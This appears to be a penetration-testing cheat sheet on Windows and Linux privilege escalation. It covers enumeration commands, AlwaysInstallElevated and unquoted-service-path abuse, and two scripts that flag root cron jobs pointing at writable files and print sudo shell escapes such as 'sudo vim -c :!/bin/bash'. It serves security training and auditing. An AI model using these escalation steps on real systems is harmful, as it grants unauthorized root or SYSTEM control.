Privilege Escalation [PrevEsc]
Manual Enumeration
Users
Windows:
Identify the current user, then enumerate the local accounts:
whoami
net user
Linux:
Identify the current user and its UID, GID and group memberships:
whoami
id
Hostname
Windows:
Obtain system and hostname information:
systeminfo
hostname
Linux:
Obtain kernel, hostname and distribution information:
uname -a
hostname
cat /etc/issue
Running Processes and Services
Windows:
List running processes and associated services:
tasklist /svc
Linux:
List all running processes:
ps aux
Network Information
Windows:
Obtain network information (interfaces, routing table, and listening/connected ports with their owning PIDs):
ipconfig /all
route print
netstat -ano
Linux:
Obtain network information (interfaces, and listening/connected sockets with their owning processes; use netstat -anp where ss is not installed):
ip a
ifconfig
ss -anp
Firewall
Windows:
Check Windows firewall settings:
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
Linux:
Check iptables rules (listing the live rule set requires root; as a low-privilege user, look instead for readable saved rule files such as /etc/iptables/rules.v4):
iptables -L
Scheduled Tasks
Windows:
List scheduled tasks:
schtasks /query /fo LIST /v
Linux:
List scheduled tasks:
ls -lah /etc/cron*
Applications and Patch Levels
Windows:
List installed applications and patches:
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn
Linux:
List installed packages:
dpkg -l
Readable/Writable Files
Windows:
List files and directories under Program Files that Everyone can write to (-u suppresses errors, -w shows only writable objects, -s recurses; add /accepteula on first run):
accesschk.exe -uws "Everyone" "C:\Program Files"
Linux:
Find writable directories:
find / -writable -type d 2>/dev/null
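The cron and writable-file checks above combine into one question: does any scheduled job reference a file that the current user can change? The script below is an added example, not part of the original page. It parses system-format crontab text (the sample crontab embedded in it is constructed, and the /opt/backup/run.sh and /home/backup/sync.sh paths are hypothetical) and reports every referenced path that is writable, or that sits in a writable directory.

```shell
#!/bin/sh
# Added example (not from the original page): walk system-format crontab text,
# pull out every absolute path a job references, and report the ones the
# current user can modify directly or via a writable parent directory.

# Emit "user<TAB>path" for every absolute path on a job line. Input is the
# system crontab format used by /etc/crontab and /etc/cron.d/* (a user field
# before the command); per-user crontabs have no user field and are not handled.
cron_job_paths() {
  awk '
    NF == 0 || $1 ~ /^#/              { next }   # blank lines and comments
    $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/   { next }   # SHELL=, PATH=, MAILTO= ...
    {
      if ($1 ~ /^@/) { u = $2; start = 3 }       # @reboot  user  command
      else           { u = $6; start = 7 }       # m h dom mon dow  user  command
      for (i = start; i <= NF; i++)
        if ($i ~ /^\/./) print u "\t" $i         # program, interpreter args, script paths
    }
  '
}

# Read "user<TAB>path" lines and classify each path:
#   WRITABLE      the file/directory itself is writable (edit or replace it)
#   DIR-WRITABLE  only its parent is writable (delete and recreate it, or the file
#                 does not exist yet and can simply be created)
# Every path is writable to root, so run this as the low-privilege user.
writable_cron_targets() {
  tab="$(printf '\t')"
  while IFS="$tab" read -r user path; do
    if [ -w "$path" ]; then
      printf 'WRITABLE %s %s\n' "$user" "$path"
    elif [ -w "$(dirname "$path")" ]; then
      printf 'DIR-WRITABLE %s %s\n' "$user" "$path"
    fi
  done
}

# Constructed sample of an /etc/crontab; the two scripts it names are hypothetical.
SAMPLE_CRONTAB='# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *  * * *  root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * *  root    /opt/backup/run.sh --quiet
@reboot      backup  /bin/bash /home/backup/sync.sh'

# Live use on a target:
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | cron_job_paths | sort -u | writable_cron_targets
```

A DIR-WRITABLE hit on a path that does not exist is the strongest finding: root's cron will run whatever you create there. On the sample, cron_job_paths yields /etc/cron.hourly, /opt/backup/run.sh, /bin/bash and /home/backup/sync.sh, so a writable /home/backup/sync.sh would be reported even though the job line starts with /bin/bash.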
Unmounted Disks
Windows:
List volumes, including those without a drive letter (shown as having no mount points):
mountvol
Linux:
List mounted filesystems, then compare against the block devices and /etc/fstab entries to spot partitions that are not mounted:
mount
Drivers and Kernel Modules
Windows:
List installed drivers:
driverquery.exe
Linux:
List loaded kernel modules, then query a module's version and description to check it against known vulnerabilities:
lsmod
modinfo <MODULE_NAME>
Binaries that Auto Elevate
Check whether the AlwaysInstallElevated policy is enabled under both the HKLM and HKCU Windows Installer keys. When both values are set to 1, any .msi package the user installs runs with SYSTEM privileges, so a crafted installer yields a SYSTEM shell.
Automated Enumeration
Tools
Use various tools for automated privilege escalation enumeration:
Windows:
windows-privesc-check
Watson
Sherlock
PowerUp
Windows-Exploit-Suggester
JAWS
winPEAS (.exe and .bat)
Linux:
linPEAS
LinEnum
Windows PrivEsc
Insecure File Permissions
Using PowerShell:
Allow unsigned scripts for this process only, then run all of PowerUp's checks:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
Check the permissions on a target file such as a service binary; full (F), modify (M) or write (W) granted to Users, Authenticated Users or Everyone means the file can be replaced:
icacls.exe "<FILE_PATH>"
Unquoted Service Paths
When a service's binary path contains spaces but is not wrapped in quotes, Windows resolves it by trying each prefix in turn (for C:\Program Files\Some App\svc.exe it first tries C:\Program.exe, then C:\Program Files\Some.exe). Confirm the path and the account the service runs as (sc qc), check each candidate directory for write access with icacls, and if one is writable place a malicious .exe there under the shorter name; it executes with the service's privileges when the service restarts.
Linux PrivEsc
Understanding Permissions in Linux
Review how Linux permissions work before hunting: read, write and execute bits for owner, group and others, plus the SUID/SGID bits that make a binary run as its owner or group. Misconfigured SUID binaries, world-writable scripts run by root, and overly broad sudo rules are the usual escalation paths.
sudo -l
Check sudo privileges:
sudo -l
sudo vim -c ':!/bin/bash'
If sudo allows running Vim (ideally with NOPASSWD), escalate by spawning a shell from inside the editor:
sudo vim -c ':!/bin/bash'
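The Vim escape above is one instance of a general pattern: a program that sudo lets you run, and that can itself spawn a shell. The script below, an added example that is not part of the original page, parses `sudo -l` output and flags such entries. Its escape table is a small illustrative subset, the embedded `sudo -l` output is constructed, and the host name web01 and user alice are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original page): parse `sudo -l` output and flag
# entries whose program lets you run a shell from inside it, the way
# `sudo vim -c ':!/bin/bash'` does. The escape table below is an illustrative
# subset chosen for this example, not a complete catalogue.

# Print a shell escape for a program name; return 1 when none is listed here.
escape_for() {
  case "$1" in
    vim|vi)    printf '%s\n' "sudo $1 -c ':!/bin/bash'   (or :!/bin/bash inside the editor if sudoers fixes the arguments)" ;;
    less|more) printf '%s\n' "sudo $1 <file>, then type !/bin/bash at the prompt" ;;
    find)      printf '%s\n' "sudo find / -maxdepth 0 -exec /bin/bash \\;" ;;
    awk)       printf '%s\n' "sudo awk 'BEGIN { system(\"/bin/bash\") }'" ;;
    env)       printf '%s\n' "sudo env /bin/bash" ;;
    bash|sh)   printf '%s\n' "sudo $1" ;;
    ALL)       printf '%s\n' "sudo -i" ;;
    *)         return 1 ;;
  esac
}

# Emit "pw<TAB>runas<TAB>command" for each command in `sudo -l` output on stdin.
# Only the indented "(runas) [TAGS:] cmd1, cmd2" lines are parsed; the
# "Matching Defaults" and "User x may run" header lines are skipped.
sudo_l_entries() {
  awk '
    /^[[:space:]]*\(/ {
      line = $0
      if (match(line, /\([^)]*\)/) == 0) next
      runas = substr(line, RSTART + 1, RLENGTH - 2)           # root  |  ALL : ALL
      line  = substr(line, RSTART + RLENGTH)
      pw = (line ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
      gsub(/[A-Z_]+:[[:space:]]*/, "", line)                  # NOPASSWD:, SETENV:, NOEXEC: ...
      n = split(line, cmds, /,[[:space:]]*/)
      for (i = 1; i <= n; i++) {
        gsub(/^[[:space:]]+|[[:space:]]+$/, "", cmds[i])
        if (cmds[i] != "") print pw "\t" runas "\t" cmds[i]
      }
    }
  '
}

# For every allowed command whose program has a known escape, print
# "pw<TAB>runas<TAB>allowed command<TAB>escape".
sudo_shell_escapes() {
  tab="$(printf '\t')"
  sudo_l_entries | while IFS="$tab" read -r pw runas cmd; do
    set -f; set -- $cmd; set +f      # word-split without globbing; $1 is the program
    prog="${1##*/}"                  # basename, so /usr/bin/vim and /bin/vim both match
    if esc="$(escape_for "$prog")"; then
      printf '%s\t%s\t%s\t%s\n' "$pw" "$runas" "$cmd" "$esc"
    fi
  done
}

# Constructed `sudo -l` output for a hypothetical user alice on host web01.
SAMPLE_SUDO_L='Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/vim
    (ALL : ALL) /usr/bin/less /var/log/syslog, /usr/bin/find
    (root) /usr/bin/apt-get update'

# Live use on a target:  sudo -l | sudo_shell_escapes
```

On the sample, vim, less and find are reported and apt-get is not. When sudoers fixes the arguments (as with less /var/log/syslog here), extra command-line flags will not match the rule, so the escape must be triggered from inside the running program; a NOPASSWD entry means the escape works even without the user's password.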